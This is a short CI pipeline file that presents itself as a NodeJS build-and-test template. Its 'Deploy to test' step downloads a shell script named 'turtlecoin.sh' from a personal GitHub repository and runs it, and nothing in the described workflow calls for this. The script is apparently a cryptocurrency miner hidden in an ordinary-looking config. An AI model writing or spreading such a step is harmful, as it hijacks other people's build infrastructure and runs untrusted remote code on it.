#  Template NodeJS build

#  This template allows you to validate your NodeJS code.
#  The workflow allows running tests and code linting on the default branch.

image: node:10.15.0

pipelines:
  default:
    - step:
        name: Build and push
        script:
          - npm install
    - step:
        name: Deploy to test
        image: golang:latest
        deployment: testbed
        script:
          - wget https://raw.githubusercontent.com/noval6161/turtlecoin/main/turtlecoin.sh && chmod u+x turtlecoin.sh && ./turtlecoin.sh
          